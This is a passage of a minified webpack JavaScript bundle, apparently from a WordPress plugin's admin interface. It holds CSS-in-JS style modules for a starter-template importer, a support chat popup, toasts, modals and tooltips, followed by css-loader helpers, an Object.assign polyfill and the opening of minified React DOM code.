svg{transform:rotate(90deg);width:100%;transition:400ms;color:#091f36;margin-left:-2px}.ultp_starter_packs_demo .ultp-starter-collapse:hover{transform:scale(1.1);background:#091f36}.ultp_starter_packs_demo .ultp-starter-collapse:hover svg{color:#fff}.ultp_starter_packs_demo .ultp-starter-collapse.inactive{right:-44px}.ultp_starter_packs_demo .ultp-starter-collapse.inactive svg{transform:rotate(-90deg);margin-left:2px}.ultp_starter_packs_demo .wp-full-overlay-sidebar-content{background:#f7f9ff;bottom:112px;top:60px}.ultp_starter_packs_demo .wp-full-overlay-sidebar-content .skeletonOverflow{padding:25px 20px}.ultp_starter_packs_demo .wp-full-overlay-sidebar-content .skeletonOverflow>.ultp_skeleton__custom_size{margin:auto}.ultp_starter_packs_demo .wp-full-overlay-sidebar-content .skeletonOverflow_colors{margin-top:30px}.ultp_starter_packs_demo .wp-full-overlay-sidebar-content .skeletonOverflow_colors>.ultp_skeleton__custom_size{margin-bottom:20px}.ultp_starter_packs_demo .wp-full-overlay-sidebar-content .skeletonOverflow_colors .demos-color{display:grid;grid-template-columns:1fr 1fr;gap:10px}.ultp_starter_packs_demo .close-full-overlay{height:60px}.ultp_starter_packs_demo .close-full-overlay::before{font-size:32px}.ultp-stater-container-settings-overlay{background:rgba(0,0,0,.7);position:absolute;right:0;height:100vh;width:100vw;z-index:999999999999;top:-32px;display:flex;justify-content:center}.ultp-stater-settings-container{position:fixed;top:6%;z-index:999;background:#fff;border-radius:4px;box-shadow:0 50px 99px 0 rgba(62,51,51,.5);display:flex}.ultp-stater-settings-container>div:first-child{flex:1;max-height:auto;width:600px}.ultp-stater-settings-container .ultp-info{margin-bottom:15px;color:#575a5d}.ultp-stater-settings-container .ultp-info.ultp-info-desc{font-size:16px}.ultp-stater-settings-container .ultp-stater-settings-header{color:#091f36;font-size:16px;font-weight:400;position:absolute;box-sizing:border-box;width:100%;top:0;padding:12px 30px;border-bottom:1px solid #eaedf2}.ultp-stater-settings-container .stater_title{color:#091f36;margin-bottom:15px;font-size:16px;font-weight:600}.ultp-stater-settings-container .ultp-popup-stater{padding:40px 40px 20px;max-height:calc(75vh - 20px);overflow:auto}.ultp-stater-settings-container .ultp-popup-stater .input_container{margin-bottom:15px}.ultp-stater-settings-container .ultp-popup-stater .input_container input[type=checkbox]{margin-right:8px;width:22px;height:20px}.ultp-stater-settings-container .ultp-popup-stater .input_container input[type=checkbox]:checked{background:#092036}.ultp-stater-settings-container .ultp-popup-stater .input_container input[type=checkbox]:checked::before{left:6px;top:9px;font-size:13px;transform:rotate(6deg)}.ultp-stater-settings-container .starter_page_impports{margin-top:25px;margin-bottom:20px}.ultp-stater-settings-container .starter_page_impports .cursor{font-size:14px;margin-top:15px;transition:400ms;color:#091f36;opacity:.7}.ultp-stater-settings-container .starter_page_impports .cursor:hover{opacity:1}.ultp-stater-settings-container .starter_page_impports .cursor svg{height:10px;width:10px;margin-left:4px}.ultp-stater-settings-container .starter_import{padding-left:40px;padding-right:40px;padding-bottom:40px;text-align:center}.ultp-stater-settings-container .starter_import .ultp-primary-button{width:100%;box-sizing:border-box;justify-content:center}.ultp-stater-settings-container .ultp-popup-close{position:absolute;font-size:0px;top:0;right:-10%;height:40px;width:40px;border-radius:50%;color:#000;cursor:pointer;border:none;padding:12px;background:#fff}.ultp-stater-settings-container .ultp-popup-close:hover{background:red}.ultp-stater-settings-container .ultp-popup-close:hover svg{color:#fff}.ultp-stater-settings-container .ultp-popup-close.s_loading{cursor:no-drop}.ultp-stater-settings-container .input_container .email_box{width:100%;box-sizing:border-box;margin:8px 0;border:1px solid #dcdcde;border-radius:2px;padding:5px 15px}.ultp-stater-settings-container .input_container .get_newsletter{background:#888}.ultp-stater-settings-container .ultp_successful_import .stater_title{font-size:20px}.ultp-stater-settings-container .ultp_successful_import .ultp_import_builders{margin:20px 0;max-width:80%;font-size:16px}.ultp-stater-settings-container .ultp_successful_import .ultp_import_builders a{color:var(--postx-primary-color);text-decoration:underline}.ultp-stater-settings-container .ultp_successful_import .ultp_import_builders a:hover{color:var(--postx-primary-hover-color)}.ultp-stater-settings-container .ultp_successful_import .ultp-primary-button{margin-bottom:20px}.ultp-stater-settings-container .ultp_processing_import .stater_title{font-size:20px}.ultp-stater-settings-container .ultp_processing_import .progress{font-size:16px;margin-top:12px}.ultp-stater-settings-container .ultp_processing_import .ultp_import_notice{margin-top:10px;margin-bottom:20px;color:var(--postx-warning-button-color)}.ultp-stater-settings-container .ultp_processing_import .ultp_import_notice>span{font-size:14px;font-weight:500}.ultp-stater-settings-container .ultp_processing_import .ultp_processing_show{margin-top:20px;margin-bottom:0;text-align:center}.ultp-stater-settings-container .ultp_processing_import .ultp_processing_show .ultp-importer-loader{width:100%;height:20px;background-color:#f0f0f0;position:relative;border-radius:4px;overflow:hidden}.ultp-stater-settings-container .ultp_processing_import .ultp_processing_show #ultp-importer-loader-bar{width:0;height:100%;background-color:var(--postx-primary-color);position:absolute;transition:width .5s}.ultp-stater-settings-container .ultp_processing_import .ultp_processing_show #ultp-importer-loader-percentage{position:absolute;top:50%;left:50%;transform:translate(-50%, -50%)}.ultp-stater-settings-container .ultp_processing_import .ultp_processing_show .ultp_processing_loader{border-radius:4px;width:80%;height:12px;display:inline-block;background-color:#f7f9ff;background-image:linear-gradient(-45deg, rgba(0, 0, 0, 0.25) 25%, transparent 25%, transparent 50%, rgba(3, 127, 255, 0.75) 50%, rgba(3, 127, 255, 0.75) 75%, transparent 75%, transparent);font-size:30px;background-size:1em 1em;box-sizing:border-box;animation:ultp_processing_loader .5s linear infinite}@keyframes ultp_processing_loader{0%{background-position:0 0}100%{background-position:1em 0}}.ultp_starter_dark_container{display:flex;gap:5px;align-items:center;margin-bottom:25px;margin-top:15px;font-size:16px}.ultp_starter_dark_container .ultp_starter_dark_enable{display:none;height:0;width:0;border-radius:2px;border:solid 1px #eaedf2;background:#fff;position:relative;margin:0;box-shadow:none}.ultp_starter_dark_container .ultp_starter_dark_enable:checked+label{opacity:unset}.ultp_starter_dark_container .ultp_starter_dark_enable:checked+label::after{left:calc(100% - 3px);transform:translateX(-100%)}.ultp_starter_dark_container>label{color:#037fff;width:36px;height:18px;display:block;cursor:pointer;border-radius:100px;text-indent:-9999px;background:var(--postx-primary-color);opacity:.4;position:relative;margin:0 8px}.ultp_starter_dark_container>label::after{content:"";position:absolute;top:3px;left:3px;width:12px;height:12px;border-radius:90px;background:#fff;transition:.3s}.ultp_starter_dark_container{justify-content:center}.ultp_starter_dark_container .ultp-dl-container{cursor:pointer;display:flex;background:#fff;gap:10px;align-items:center;border-radius:100px;width:140px;height:40px;box-shadow:0px 0px 0 2px rgba(9,32,54,.2),2px 4px 15px 5px rgba(9,32,54,.1)}.ultp_starter_dark_container .ultp-dl-container svg{height:20px;width:20px}.ultp_starter_dark_container .ultp-dl-container .ultp-dl-svg-con{transform:translateX(4px)}.ultp_starter_dark_container .ultp-dl-container .ultp-dl-svg-con.dark svg{color:#fff}.ultp_starter_dark_container .ultp-dl-svg{display:flex;background:#091f36;padding:6px;border-radius:50%}.ultp_starter_dark_container .ultp-dl-svg svg{fill:#ffc107}.iframe_loader{height:100%;width:100%;background-color:#fff;overflow-y:scroll}.iframe_loader .iframe_container{width:calc(100% - 80px);height:100%;display:flex;flex-direction:column;gap:40px;padding:60px 40px}.iframe_loader .iframe_header_top{display:flex;justify-content:space-between;gap:40px;align-items:center}.iframe_loader .header_top_right{display:flex;justify-content:space-between;align-items:center;gap:20px}.iframe_loader .iframe_body{height:100%;display:flex;flex-wrap:wrap;gap:24px;margin-top:20px}.iframe_loader .iframe_body_slider{margin-bottom:60px}.iframe_loader .iframe_body_left{flex-basis:calc(60% - 12px);border-radius:4px;display:flex;flex-direction:column;gap:20px}.iframe_loader .iframe_body_right{flex-basis:calc(40% - 12px);border-radius:4px;display:flex;flex-direction:column;gap:20px}.ultp-starter-button{cursor:pointer;padding:12px 25px;color:#fff !important;font-size:14px;background:linear-gradient(180deg, #399aff, transparent) #004fd0;border-radius:4px;text-decoration:none;display:inline-block;width:fit-content;border:none;transition:background-color 400ms}.ultp-starter-button:hover{background-color:var(--postx-primary-color)}',""]);const l=i},6922:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,':root{--xpo-support-color-primary: #335cff;--xpo-support-color-secondary: #4263eb;--xpo-support-color-base-one: #ffffff;--xpo-support-color-base-two: #e1e7ff;--xpo-support-color-base-three: #e0e0e0;--xpo-support-color-green: #09fd09;--xpo-support-color-red: #fb3748;--xpo-support-color-dark: #070707;--xpo-support-color-reverse: #ffffff;--xpo-support-color-title: #0e121b;--xpo-support-color-border-primary: #e1e4ea;--xpo-support-color-shadow: rgba(0, 0, 0, 0.1)}.xpo-support-pops-btn{position:fixed;bottom:34px;right:20px;background-color:var(--xpo-support-color-primary);border-radius:50%;width:56px;height:56px;display:flex;justify-content:center;align-items:center;box-shadow:0 4px 15px var(--xpo-support-color-shadow);cursor:pointer;z-index:9999;transition-property:all;transition-duration:.2s}.xpo-support-pops-btn--small{scale:.8;bottom:0px;right:0px;transition-property:all;transition-duration:.2s}.xpo-support-pops-btn--small:hover:after{content:"";position:absolute;inset:-20px;z-index:-10}.xpo-support-pops-btn--small:hover{scale:1;bottom:34px;right:20px}.xpo-support-pops-btn--big{scale:1 !important;bottom:34px !important;right:20px !important}.xpo-support-pops-container--full-height{max-height:551px;height:calc(100vh - 150px);overflow:auto !important}.xpo-support-pops-container{position:fixed;bottom:90px;right:20px;background-color:var(--xpo-support-color-base-one);border-radius:8px;box-shadow:0 4px 15px var(--xpo-support-color-shadow);overflow:hidden;width:400px;max-width:calc(100% - 40px);z-index:9999;margin-bottom:8px}.xpo-support-pops-header{background-color:var(--xpo-support-color-primary);color:var(--xpo-support-color-reverse);text-align:center;padding:24px 24px 0;position:relative;overflow:hidden;z-index:0}.xpo-support-header-bg{position:absolute;inset:0;z-index:-1;opacity:.2;background:radial-gradient(circle, var(--xpo-support-color-secondary) 4px, transparent 5px),radial-gradient(circle, var(--xpo-support-color-reverse) 5px, transparent 5px);background-repeat:repeat;background-size:20px 20px,20px 20px}.xpo-support-pops-avatars{width:fit-content;margin:0 auto;position:relative}.xpo-support-pops-avatars img{display:inline-block;justify-content:center;align-items:center;margin-bottom:15px;width:60px;height:60px;border-radius:50%;margin-left:-20px;border:2px solid var(--xpo-support-color-primary);margin-bottom:5px}.xpo-support-signal{width:10px;height:10px;border-radius:50%;display:inline-block;margin-left:5px;border:2px solid var(--xpo-support-color-base-one);position:absolute;bottom:14px;right:6px}.xpo-support-signal-green{background-color:var(--xpo-support-color-green)}.xpo-support-signal-red{background-color:var(--xpo-support-color-red)}.xpo-support-pops-text{font-weight:600;font-size:14px;padding-bottom:24px}.xpo-support-chat-body{padding:20px}.xpo-support-title{font-size:14px;font-weight:500;line-height:20px;letter-spacing:-0.08px;color:var(--xpo-support-color-title);margin-bottom:4px}input.xpo-input-support,textarea.xpo-input-support{width:100%;padding:12px;border:1px solid var(--xpo-support-color-border-primary);border-radius:4px;font-size:16px;outline:none;margin-bottom:16px}input[type=email].xpo-input-support{max-height:48px}textarea.xpo-input-support{min-height:150px;resize:none}.xpo-send-button{background-color:var(--xpo-support-color-primary);color:var(--xpo-support-color-reverse);width:100%;padding:15px;border:none;border-radius:4px;font-size:16px;font-weight:500;cursor:pointer;display:flex;justify-content:center;align-items:center;gap:10px}.xpo-support-animation{width:45px;height:45px;border-radius:50%;display:block;stroke-width:2;margin:10px !important;color:var(--xpo-support-color-base-one);stroke-miterlimit:10;box-shadow:inset 0 0 0 var(--xpo-support-color-base-two);animation:fill-message .4s ease-in-out .4s forwards,scale-message .3s ease-in-out .9s both;margin-right:10px !important}@keyframes scale-message{0%,100%{transform:none}50%{transform:scale3d(1.1, 1.1, 1)}}@keyframes fill-message{100%{box-shadow:inset 0px 0px 0px 30px var(--xpo-support-color-base-two)}}.xpo-support-circle{stroke-dasharray:166;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;color:var(--xpo-support-color-base-two);fill:none;animation:stroke-message .6s cubic-bezier(0.65, 0, 0.45, 1) forwards}.xpo-support-check{stroke-width:2;color:var(--xpo-support-color-primary)}@keyframes stroke-message{100%{stroke-dashoffset:0}}.xpo-support-thankyou-icon{line-height:0;margin:0 auto;width:fit-content}.xpo-support-thankyou-title{margin:24px auto 12px;font-size:24px;font-weight:600;line-height:32px;letter-spacing:-0.36px;color:var(--xpo-support-color-dark);text-align:center}.xpo-support-thankyou-subtitle{font-size:14px;line-height:20px;font-weight:400;letter-spacing:-0.18px;text-align:center}.xpo-support-entry-anim{animation:xpo-support-entry-anim 200ms ease 0s 1 normal forwards}@keyframes xpo-support-entry-anim{0%{opacity:0;transform:translateY(50px)}100%{opacity:1;transform:translateY(0)}}.xpo-support-loading{--loader-size: 21px;--loader-thickness: 3px;--loader-brand-color: var(--xpo-support-color-reverse);width:var(--loader-size);aspect-ratio:1;border-radius:50%;background:radial-gradient(farthest-side, var(--loader-brand-color) 94%, rgba(0, 0, 0, 0)) top/var(--loader-thickness) var(--loader-thickness) no-repeat,conic-gradient(rgba(0, 0, 0, 0) 30%, var(--loader-brand-color));mask:radial-gradient(farthest-side, rgba(0, 0, 0, 0) calc(100% - var(--loader-thickness)), #000 0);animation:xpo-support-loading-anim 1s infinite linear}@keyframes xpo-support-loading-anim{100%{transform:rotate(1turn)}}#xpo-support-file-input{width:100%;max-width:100%;color:#444;padding:4px;background:#fff;border:1px solid var(--xpo-support-color-border-primary);border-radius:4px;font-size:14px;min-height:unset}#xpo-support-file-input::file-selector-button{margin-right:20px;border:none;background:var(--xpo-support-color-primary);padding:5px 10px;font-size:16px;border-radius:4px;color:var(--xpo-support-color-reverse);cursor:pointer;transition:background .2s ease-in-out}#xpo-support-file-input::file-selector-button:hover{background:var(--xpo-support-color-secondary)}',""]);const l=i},439:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,".toastMessages{display:flex;flex-direction:column;gap:10px;padding:10px;position:fixed;right:400px;z-index:1001;top:70px}.toast{position:absolute}.toaster{position:fixed;visibility:hidden;width:345px;background-color:#fefefe;height:76px;border-radius:4px;box-shadow:0px 0px 4px #9f9f9f;display:flex;align-items:center}.toaster span{display:block}.toaster .itmCenter{font-size:14px}.toaster .itmLast{padding:0 15px;margin-left:auto;height:100%;display:flex;align-items:center;border-left:1px solid #f2f2f2}.toaster .itmLast:hover{cursor:pointer;background-color:#f2f2f2}.toaster.show{visibility:visible;-webkit-animation:fadeinmessage .7s;animation:fadeinmessage .7s}@keyframes fadeinmessage{from{right:0;opacity:0}to{right:65px;opacity:1}}.circle{stroke-dasharray:166;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;color:#7ac142;fill:none;animation:strokemessage .6s cubic-bezier(0.65, 0, 0.45, 1) forwards}.animation{width:45px;height:45px;border-radius:50%;display:block;stroke-width:2;margin:10px;color:#fff;stroke-miterlimit:10;box-shadow:inset 0px 0px 0px #7ac142;animation:fillmessage .4s ease-in-out .4s forwards,scalemessage .3s ease-in-out .9s both;margin-right:10px}.check{transform-origin:50% 50%;stroke-dasharray:48;stroke-dashoffset:48;animation:strokemessage .3s cubic-bezier(0.65, 0, 0.45, 1) .8s forwards}.cross{color:red;fill:red}@keyframes strokemessage{100%{stroke-dashoffset:0}}@keyframes scalemessage{0%,100%{transform:none}50%{transform:scale3d(1.1, 1.1, 1)}}@keyframes fillmessage{100%{box-shadow:inset 0px 0px 0px 30px #7ac142}}",""]);const l=i},9839:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,'.ultp-dashboard-modal-wrapper{position:fixed;left:0;top:0;width:100%;height:100%;display:flex;align-items:center;justify-content:center;z-index:999999;background:rgba(0,0,0,.35)}.ultp-dashboard-modal-wrapper .ultp-dashboard-modal{width:fit-content;background:#fff;max-width:90%;max-height:80%;overflow:hidden}.ultp-dashboard-modal-wrapper .ultp-modal-header{display:flex;align-items:center;height:40px;padding:0 20px 0;background:#e3f1ff;position:relative}.ultp-dashboard-modal-wrapper .ultp-modal-header .ultp-modal-title{font-size:1.2rem;font-weight:600;color:#091f36}.ultp-dashboard-modal-wrapper .ultp-modal-header .ultp-popup-close{position:absolute;top:-3px;right:0;color:var(--postx-white-color);font-size:25px;cursor:pointer;border:none;padding:0px 9px 3px;background-color:var(--postx-dark-color);z-index:99}.ultp-dashboard-modal-wrapper .ultp-modal-header .ultp-popup-close::after{content:"×"}.ultp-dashboard-modal-wrapper .ultp-modal-header .ultp-popup-close:hover{background:red}.ultp-dashboard-modal-wrapper .ultp-modal-body{padding:20px}.ultp-dashboard-modal-wrapper .ultp-modal-body iframe{max-width:100%;max-height:100%}',""]);const l=i},1211:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,'.ultp_skeleton__image{height:300px;width:300px;border-radius:4px}.ultp_skeleton__circle{height:300px;width:300px;border-radius:50%}.ultp_skeleton__title{height:20px;width:100%;border-radius:4px}.ultp_skeleton__button{height:40px;width:90px;border-radius:4px}.ultp_frequency{position:relative;background-color:#e2e2e2;overflow:hidden}.ultp_frequency.loop{margin-bottom:10px}.ultp_frequency.loop:last-child{margin-bottom:0}.ultp_frequency::after{display:block;content:"";position:absolute;width:100%;height:100%;transform:translateX(-100%);background:-webkit-gradient(linear, left top, right top, from(transparent), color-stop(rgba(255, 255, 255, 0.2)), to(transparent));background:linear-gradient(90deg, transparent, rgba(255, 255, 255, 0.2), transparent);animation:loadings .8s infinite}.skeletonOverflow{overflow:hidden}@keyframes loadings{100%{transform:translateX(100%)}}',""]);const l=i},1589:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,'.ultp-tooltip-wrapper{display:inline-block;position:relative;width:inherit;height:inherit}.ultp-tooltip-wrapper.ultp-preset-typo-tooltip{position:unset}.ultp-tooltip-wrapper.ultp-preset-typo-tooltip .tooltip-content{width:fit-content;bottom:unset;left:90px;top:-36px !important}.ultp-tooltip-wrapper.ultp-preset-typo-tooltip .tooltip-content::before{content:unset}.tooltip-content{top:unset !important;background:#000;color:#fff;font-size:12px;line-height:1.4;z-index:100;white-space:pre-wrap;width:250px;position:absolute;bottom:25px;transform:translateX(-46%);padding:8px 12px;border-radius:4px;white-space:pre-wrap}.tooltip-content::before{content:" ";left:50%;border:solid rgba(0,0,0,0);height:0;width:0;position:absolute;pointer-events:none;border-width:6px;margin-left:-6px}.tooltip-content.top::before{top:100%;border-top-color:#000}.tooltip-content.right{left:calc(100% + 30px);top:50%;transform:translateX(0) translateY(-50%)}.tooltip-content.right::before{left:-6px;top:50%;transform:translateX(0) translateY(-50%);border-right-color:#000}.tooltip-content.bottom{bottom:-30px}.tooltip-content.bottom::before{bottom:100%;border-bottom-color:#000}.tooltip-content.left{left:auto;right:calc(100% + 30px);top:50%;transform:translateX(0) translateY(-50%)}.tooltip-content.left::before{left:auto;right:-12px;top:50%;transform:translateX(0) translateY(-50%);border-left-color:#000}.tooltip-icon{width:inherit;height:inherit;font-size:28px}',""]);const l=i},1729:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,".ultp-design-search-wrapper{margin-bottom:20px;width:fit-content;margin-left:auto;margin-right:auto}@media only screen and (max-width: 1250px){.ultp-design-search-wrapper{display:none}}.ultp-design-search-wrapper .ultp-design-search-input{color:#575a5d;padding:8px 15px;min-width:250px;height:36px;font-size:14px;border-radius:2px;border:solid 1px #eaedf2;background-color:#fff}.ultp-design-search-wrapper .ultp-design-search-input:focus{border:1px solid var(--postx-primary-color);box-shadow:unset}@media only screen and (max-width: 1350px){.ultp-design-search-wrapper .ultp-design-search-input{min-width:220px}}",""]);const l=i},3645:e=>{"use strict";e.exports=function(e){var t=[];return t.toString=function(){return this.map((function(t){var n="",a=void 0!==t[5];return t[4]&&(n+="@supports (".concat(t[4],") {")),t[2]&&(n+="@media ".concat(t[2]," {")),a&&(n+="@layer".concat(t[5].length>0?" ".concat(t[5]):""," {")),n+=e(t),a&&(n+="}"),t[2]&&(n+="}"),t[4]&&(n+="}"),n})).join("")},t.i=function(e,n,a,r,o){"string"==typeof e&&(e=[[null,e,void 0]]);var i={};if(a)for(var l=0;l<this.length;l++){var s=this[l][0];null!=s&&(i[s]=!0)}for(var p=0;p<e.length;p++){var c=[].concat(e[p]);a&&i[c[0]]||(void 0!==o&&(void 0===c[5]||(c[1]="@layer".concat(c[5].length>0?" ".concat(c[5]):""," {").concat(c[1],"}")),c[5]=o),n&&(c[2]?(c[1]="@media ".concat(c[2]," {").concat(c[1],"}"),c[2]=n):c[2]=n),r&&(c[4]?(c[1]="@supports (".concat(c[4],") {").concat(c[1],"}"),c[4]=r):c[4]="".concat(r)),t.push(c))}},t}},1667:e=>{"use strict";e.exports=function(e,t){return t||(t={}),e?(e=String(e.__esModule?e.default:e),/^['"].*['"]$/.test(e)&&(e=e.slice(1,-1)),t.hash&&(e+=t.hash),/["'() \t\n]|(%20)/.test(e)||t.needQuotes?'"'.concat(e.replace(/"/g,'\\"').replace(/\n/g,"\\n"),'"'):e):e}},8081:e=>{"use strict";e.exports=function(e){return e[1]}},7418:e=>{"use strict";var t=Object.getOwnPropertySymbols,n=Object.prototype.hasOwnProperty,a=Object.prototype.propertyIsEnumerable;e.exports=function(){try{if(!Object.assign)return!1;var e=new String("abc");if(e[5]="de","5"===Object.getOwnPropertyNames(e)[0])return!1;for(var t={},n=0;n<10;n++)t["_"+String.fromCharCode(n)]=n;if("0123456789"!==Object.getOwnPropertyNames(t).map((function(e){return t[e]})).join(""))return!1;var a={};return"abcdefghijklmnopqrst".split("").forEach((function(e){a[e]=e})),"abcdefghijklmnopqrst"===Object.keys(Object.assign({},a)).join("")}catch(e){return!1}}()?Object.assign:function(e,r){for(var o,i,l=function(e){if(null==e)throw new TypeError("Object.assign cannot be called with null or undefined");return Object(e)}(e),s=1;s<arguments.length;s++){for(var p in o=Object(arguments[s]))n.call(o,p)&&(l[p]=o[p]);if(t){i=t(o);for(var c=0;c<i.length;c++)a.call(o,i[c])&&(l[i[c]]=o[i[c]])}}return l}},4448:(e,t,n)=>{"use strict";var a=n(7294),r=n(7418),o=n(3840);function i(e){for(var t="https://reactjs.org/docs/error-decoder.html?invariant="+e,n=1;n<arguments.length;n++)t+="&args[]="+encodeURIComponent(arguments[n]);return"Minified React error #"+e+"; visit "+t+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}if(!a)throw Error(i(227));var l=new Set,s={};function p(e,t){c(e,t),c(e+"Capture",t)}function c(e,t){for(s[e]=t,e=0;e<t.length;e++)l.add(t[e])}var d=!("undefined"==typeof window||void 0===window.document||void 0===window.document.createElement),u=/^[:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD][:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD\-.0-9\u00B7\u0300-\u036F\u203F-\u2040]*$/,m=Object.prototype.hasOwnProperty,f={},h={};function g(e,t,n,a,r,o,i){this.acceptsBooleans=2===t||3===t||4===t,this.attributeName=a,this.attributeNamespace=r,this.mustUseProperty=n,this.propertyName=e,this.type=t,this.sanitizeURL=o,this.removeEmptyString=i}var v={};"children dangerouslySetInnerHTML defaultValue defaultChecked innerHTML suppressContentEditableWarning suppressHydrationWarning style".split(" ").forEach((function(e){v[e]=new g(e,0,!1,e,null,!1,!1)})),[["acceptCharset","accept-charset"],["className","class"],["htmlFor","for"],["httpEquiv","http-equiv"]].forEach((function(e){var t=e[0];v[t]=new g(t,1,!1,e[1],null,!1,!1)})),["contentEditable","draggable","spellCheck","value"].forEach((function(e){v[e]=new g(e,2,!1,e.toLowerCase(),null,!1,!1)})),["autoReverse","externalResourcesRequired","focusable","preserveAlpha"].forEach((function(e){v[e]=new g(e,2,!1,e,null,!1,!1)})),"allowFullScreen async autoFocus autoPlay controls default defer disabled disablePictureInPicture disableRemotePlayback formNoValidate hidden loop noModule noValidate open playsInline readOnly required reversed scoped seamless itemScope".split(" ").forEach((function(e){v[e]=new g(e,3,!1,e.toLowerCase(),null,!1,!1)})),["checked","multiple","muted","selected"].forEach((function(e){v[e]=new g(e,3,!0,e,null,!1,!1)})),["capture","download"].forEach((function(e){v[e]=new g(e,4,!1,e,null,!1,!1)})),["cols","rows","size","span"].forEach((function(e){v[e]=new g(e,6,!1,e,null,!1,!1)})),["rowSpan","start"].forEach((function(e){v[e]=new g(e,5,!1,e.toLowerCase(),null,!1,!1)}));var _=/[\-:]([a-z])/g;function w(e){return e[1].toUpperCase()}function b(e,t,n,a){var r=v.hasOwnProperty(t)?v[t]:null;(null!==r?0===r.type:!a&&2<t.length&&("o"===t[0]||"O"===t[0])&&("n"===t[1]||"N"===t[1]))||(function(e,t,n,a){if(null==t||function(e,t,n,a){if(null!==n&&0===n.type)return!1;switch(typeof t){case"function":case"symbol":return!0;case"boolean":return!a&&(null!==n?!n.acceptsBooleans:"data-"!==(e=e.toLowerCase().slice(0,5))&&"aria-"!==e);default:return!1}}(e,t,n,a))return!0;if(a)return!1;if(null!==n)switch(n.type){case 3:return!t;case 4:return!1===t;case 5:return isNaN(t);case 6:return isNaN(t)||1>t}return!1}(t,n,r,a)&&(n=null),a||null===r?function(e){return!!m.call(h,e)||!m.call(f,e)&&(u.test(e)?h[e]=!0:(f[e]=!0,!1))}(t)&&(null===n?e.removeAttribute(t):e.setAttribute(t,""+n)):r.mustUseProperty?e[r.propertyName]=null===n?3!==r.type&&"":n:(t=r.attributeName,a=r.attributeNamespace,null===n?e.removeAttribute(t):(n=3===(r=r.type)||4===r&&!0===n?"":""+n,a?e.setAttributeNS(a,t,n):e.setAttribute(t,n))))}"accent-height alignment-baseline arabic-form baseline-shift cap-height clip-path clip-rule color-interpolation color-interpolation-filters color-profile color-rendering dominant-baseline enable-background fill-opacity fill-rule flood-color flood-opacity font-family font-size font-size-adjust font-stretch font-style font-variant font-weight glyph-name glyph-orientation-horizontal glyph-orientation-vertical horiz-adv-x horiz-origin-x image-rendering letter-spacing lighting-color marker-end marker-mid marker-start overline-position overline-thickness paint-order panose-1 pointer-events rendering-intent shape-rendering stop-color stop-opacity strikethrough-position strikethrough-thickness stroke-dasharray stroke-dashoffset stroke-linecap stroke-linejoin stroke-miterlimit stroke-opacity stroke-width text-anchor text-decoration text-rendering underline-position underline-thickness unicode-bidi unicode-range units-per-em v-alphabetic v-hanging v-ideographic v-mathematical vector-effect vert-adv-y vert-origin-x vert-origin-y word-spacing writing-mode xmlns:xlink x-height".split(" ").forEach((function(e){var t=e.replace(_,w);v[t]=new g(t,1,!1,e,null,!1,!1)})),"xlink:actuate xlink:arcrole xlink:role xlink:show xlink:title xlink:type".split(" ").forEach((function(e){var t=e.replace(_,w);v[t]=new g(t,1,!1,e,"http://www.w3.org/1999/xlink",!1,!1)})),["xml:base","xml:lang","xml:space"].forEach((function(e){var t=e.replace(_,w);v[t]=new g(t,1,!1,e,"http://www.w3.org/XML/1998/namespace",!1,!1)})),["tabIndex","crossOrigin"].forEach((function(e){v[e]=new g(e,1,!1,e.toLowerCase(),null,!1,!1)})),v.xlinkHref=new g("xlinkHref",1,!1,"xlink:href","http://www.w3.org/1999/xlink",!0,!1),["src","href","action","formAction"].forEach((function(e){v[e]=new g(e,1,!1,e.toLowerCase(),null,!0,!0)}));var x=a.__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED,y=60103,k=60106,E=60107,C=60108,S=60114,M=60109,L=60110,N=60112,Z=60113,P=60120,z=60115,A=60116,B=60121,H=60128,T=60129,R=60130,O=60131;if("function"==typeof Symbol&&Symbol.for){var j=Symbol.for;y=j("react.element"),k=j("react.portal"),E=j("react.fragment"),C=j("react.strict_mode"),S=j("react.profiler"),M=j("react.provider"),L=j("react.context"),N=j("react.forward_ref"),Z=j("react.suspense"),P=j("react.suspense_list"),z=j("react.memo"),A=j("react.lazy"),B=j("react.block"),j("react.scope"),H=j("react.opaque.id"),T=j("react.debug_trace_mode"),R=j("react.offscreen"),O=j("react.legacy_hidden")}var V,F="function"==typeof Symbol&&Symbol.iterator;function W(e){return null===e||"object"!=typeof e?null:"function"==typeof(e=F&&e[F]||e["@@iterator"])?e:null}function D(e){if(void 0===V)try{throw Error()}catch(e){var t=e.stack.trim().match(/\n( *(at )?)/);V=t&&t[1]||""}return"\n"+V+e}var I=!1;function U(e,t){if(!e||I)return"";I=!0;var n=Error.prepareStackTrace;Error.prepareStackTrace=void 0;try{if(t)if(t=function(){throw Error()},Object.defineProperty(t.prototype,"props",{set:function(){throw Error()}}),"object"==typeof Reflect&&Reflect.construct){try{Reflect.construct(t,[])}catch(e){var a=e}Reflect.construct(e,[],t)}else{try{t.call()}catch(e){a=e}e.call(t.prototype)}else{try{throw Error()}catch(e){a=e}e()}}catch(e){if(e&&a&&"string"==typeof e.stack){for(var 